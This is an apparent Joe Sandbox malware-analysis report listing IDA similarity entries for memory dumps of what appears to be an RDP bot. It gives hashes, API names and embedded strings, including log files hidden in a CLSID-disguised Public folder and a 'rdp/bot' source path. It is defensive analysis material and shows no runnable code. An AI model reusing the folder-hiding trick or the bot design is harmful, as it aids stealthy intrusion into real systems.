                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
                  • API String ID: 513531256-2601447032
                  • Opcode ID: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                  • Instruction ID: bc033abf4b490792397e9d5b6da16b634b20aac5a3859fb5f296f7d2c7242c86
                  • Opcode Fuzzy Hash: 1a7e9c9ec7bae933ecc4019bc3fe970f4cd41a9ad4663795c4800373867ad189
                  • Instruction Fuzzy Hash: 27417F71A4CA8186F322DB66E8943FD336ABB897A4F4400B5DA0D877B5CF2DE5858701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log
                  • API String ID: 513531256-1022500615
                  • Opcode ID: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                  • Instruction ID: f3c1ae03af07e628172fc752b1c7a554f0c613b1a057ac218881e9cab8e22ad9
                  • Opcode Fuzzy Hash: 6d63ff14d14e77d7d9893b7cf131dd796ece7ae35e9587e97000a2984af39abb
                  • Instruction Fuzzy Hash: 2C416E72A0CA8686F731AF55E8543B933A1FB88780F440131DA8D477B6CF6CE5858F40
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
                  • API String ID: 513531256-2115573132
                  • Opcode ID: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                  • Instruction ID: 51df0ccf804abd66d1a12af380f48a0e065f8e79715e52f53c7d2a931c677085
                  • Opcode Fuzzy Hash: 5c96a4841fcf32cb0990ea46f84c34129a0b230b4ef58bcda0142fca1c46c413
                  • Instruction Fuzzy Hash: 7D412A61A0D68686F220AB11F8543B97361BF89B80F540036DACE97BB6CF3DE586C740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                  • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
                  • API String ID: 513531256-2729875187
                  • Opcode ID: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                  • Instruction ID: 13eb223085053165ca3a206ab039972062cbdee92dfdad934736c358a8e31dcf
                  • Opcode Fuzzy Hash: b0e16de90528dddbaa36a4a9c88e4def37decd2482aa2aa138530108e3277cd1
                  • Instruction Fuzzy Hash: F441D331A0CE4186FB209BA2EC543BB27A8FB857A0F8450B4DA4D477B1EF3DE5858700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: CopyErrorFileLastfflushfwrite
                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                  • API String ID: 2887799713-3464183404
                  • Opcode ID: 8a22f5f2bbeffa37bbdc8c419366c9977bd980236b5d373f88f1ed3121c0c59f
                  • Instruction ID: 8d3217b531609092cf25d0daa683c832bf3f33dec608fc35bd84b9a2443937b3
                  • Opcode Fuzzy Hash: 8a22f5f2bbeffa37bbdc8c419366c9977bd980236b5d373f88f1ed3121c0c59f
                  • Instruction Fuzzy Hash: E241D350A0D706D9F6216A299800B77D5207F15BCCFF444BAC91FC6684EE6DEA81C321
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: DeleteErrorFileLast
                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                  • API String ID: 2018770650-4119452840
                  • Opcode ID: 64322ccbdffc7235eab1e505e611ff72ea0675a963048a7793fc422fa198358f
                  • Instruction ID: 93a273e13990eb3e8a6a18b1abab2c7aaf87de4bc649f9e58093991b29e3e793
                  • Opcode Fuzzy Hash: 64322ccbdffc7235eab1e505e611ff72ea0675a963048a7793fc422fa198358f
                  • Instruction Fuzzy Hash: 4A311751F0C306C6FA617A08A4903B9E1445F567D4FF548FACE9ECB291AD3CACC59232
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                  • API String ID: 1729277954-887953274
                  • Opcode ID: 13556a42b43b950ca5e744f25c65d511f35711efade1e49ae77115d13bd45b62
                  • Instruction ID: bc795a243c42a86c6a4479ad46f8c9c246e2d2242461297187f3a7ae70f82b66
                  • Opcode Fuzzy Hash: 13556a42b43b950ca5e744f25c65d511f35711efade1e49ae77115d13bd45b62
                  • Instruction Fuzzy Hash: E411E671A0C94296E311AB67E840079666AFF887B4F104276EA6D837B4DF7CD50ACB01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                  • API String ID: 1729277954-887953274
                  • Opcode ID: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
                  • Instruction ID: 50d617040d8d4fb8e9c0884c514436c2805cb0120ae249172947cb8794f4c380
                  • Opcode Fuzzy Hash: 5b33547d2e8b2079c483bff5ae4c0ca30c3b29f38f34b3308c77c28b13d9fdbb
                  • Instruction Fuzzy Hash: 8D1142B2A1864796E334AF19E80067A77A0EF88754F504235E9AE83BB4DF7CD549CF00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                  • API String ID: 1729277954-887953274
                  • Opcode ID: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
                  • Instruction ID: 96392233d462ee23b98f42f5f5bdf917eb723852cf4880b8a591e347f2f528ca
                  • Opcode Fuzzy Hash: 3bfaa4a80639916eba1a0dc93ee1bfbb9301a9e214be40c6f5af664c170a041f
                  • Instruction Fuzzy Hash: 9D112E71A0C55696F360AB26E8004666671AF88754F104237EAEE836B5DF7CD549CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                  • API String ID: 1729277954-887953274
                  • Opcode ID: cb40287893e08d24f375e63105966694ca813ec55b6096321e8db1e943bfa61b
                  • Instruction ID: 427271bd437a37ae01a6be7a4b1c9630556688cd4d796d9411bbec9c3667994f
                  • Opcode Fuzzy Hash: cb40287893e08d24f375e63105966694ca813ec55b6096321e8db1e943bfa61b
                  • Instruction Fuzzy Hash: 2811E270A0899386E7209F9BEC0416BA668FF88774F505271E96D83BF4DF7CE5498B00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: AttributesErrorFileLast
                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                  • API String ID: 1799206407-1112464793
                  • Opcode ID: 38fd0e5ace3a90731aa4c1de3ed54d7d45c7ed19f706f8952875fd285bf06559
                  • Instruction ID: 97232e82dc0d58ec4fd7354e9477f83399be3cb31a381f3c20d883782188e543
                  • Opcode Fuzzy Hash: 38fd0e5ace3a90731aa4c1de3ed54d7d45c7ed19f706f8952875fd285bf06559
                  • Instruction Fuzzy Hash: B921E750F5C783C2FB60B658954437DA180AFA0389FF466FAD14FCA5D0CE1CEC855A22
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: AttributesErrorFileLast
                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                  • API String ID: 1799206407-1112464793
                  • Opcode ID: 8eb77c29a115483c1d00370f553c19a5abcb69a10457035b0e447320d5318180
                  • Instruction ID: c20d61a5ea7076410e9d22f62f488f79098d6a52c9d950631a1edbeb45b86637
                  • Opcode Fuzzy Hash: 8eb77c29a115483c1d00370f553c19a5abcb69a10457035b0e447320d5318180
                  • Instruction Fuzzy Hash: 9F21CD50E0CC8382FB654ADAA86437C225EAF00339F7449BBD04ECA1F0DE1DED859622
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastrecv
                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                  • API String ID: 2514157807-65069805
                  • Opcode ID: c951a779dacf63a1d93b4dead8992f5f86d12e3367585fa900f4cf7e67898cdc
                  • Instruction ID: 4a14b12112b32f653a26acbd46b19ee21f885cc5a1d5b6f6a921e525e705085b
                  • Opcode Fuzzy Hash: c951a779dacf63a1d93b4dead8992f5f86d12e3367585fa900f4cf7e67898cdc
                  • Instruction Fuzzy Hash: B9119150A0CD2391FB61539BE85027D22496F407F8F4053B9DC3E8A6F6DE9CA9868300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLastrecv
                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                  • API String ID: 2514157807-65069805
                  • Opcode ID: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
                  • Instruction ID: e56dc9eff2860ec37c974bd0888b7b1d097aeb1c1e0e716b6859889fbf120d95
                  • Opcode Fuzzy Hash: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
                  • Instruction Fuzzy Hash: 7E116D91E1EA0B56FA349F29A8403B81251AF407B0F508331DDAD866F1EE2CA5468B00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: ErrorLastrecv
                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                  • API String ID: 2514157807-65069805
                  • Opcode ID: 600fb125d6f5a9079b8c509fb790a0880408a47db6870ead9de6cf7768b8e42f
                  • Instruction ID: c2e2bc99f1896020a7fd68f9a2bdf09e21b30106d6722e7998532203ca4b268f
                  • Opcode Fuzzy Hash: 600fb125d6f5a9079b8c509fb790a0880408a47db6870ead9de6cf7768b8e42f
                  • Instruction Fuzzy Hash: 72115150A0DD5B42FB106BA7EC403BA13596F057F0F9857B0D82E566F2DE1CB9968300
                  APIs
                  • LoadLibraryA.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016A2
                  • GetLastError.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016CE
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ErrorLastLibraryLoadfflushfwrite
                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                  • API String ID: 4085810780-4145076245
                  • Opcode ID: 44a3c61c7f841f6fdd73cb310ba1271f7bb522fdb1b69e3fa0a93461e7fa5b29
                  • Instruction ID: 8574786078315977af04ed4a29520c13295de27a31a3390aa4db31a0300d78fe
                  • Opcode Fuzzy Hash: 44a3c61c7f841f6fdd73cb310ba1271f7bb522fdb1b69e3fa0a93461e7fa5b29
                  • Instruction Fuzzy Hash: 1EF0BE10B0A703C9FE12B75AAC500B4A2506F05BC8FF804B5CD0C87751ED2DAD86C330
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Startupfflushfwrite
                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                  • API String ID: 3771387389-898331216
                  • Opcode ID: 2d57f8f816d0c29b1e4946315c1927828a9d8b7d9ea682e483b0f31a80183f6f
                  • Instruction ID: 8ce2477bd05b3e9710a4c5bae974c8f53f3f856e13aabe3147a34febb0652d2c
                  • Opcode Fuzzy Hash: 2d57f8f816d0c29b1e4946315c1927828a9d8b7d9ea682e483b0f31a80183f6f
                  • Instruction Fuzzy Hash: 74F06DA1B0CE03A5FB529B57E8503F8231AAF143B4F8405BAD80E4A1B7EE5DE5498700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Startupfflushfwrite
                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                  • API String ID: 3771387389-898331216
                  • Opcode ID: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
                  • Instruction ID: 48f034637672fb6a1669f4886f288e988f552bf5d4b7ef60340667aab2f9bb19
                  • Opcode Fuzzy Hash: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
                  • Instruction Fuzzy Hash: CFF01DA1F1A94792FB359F18E8063F52361EF54784F44443AD98D866B6EE1CE5498F00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Startupfflushfwrite
                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                  • API String ID: 3771387389-898331216
                  • Opcode ID: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
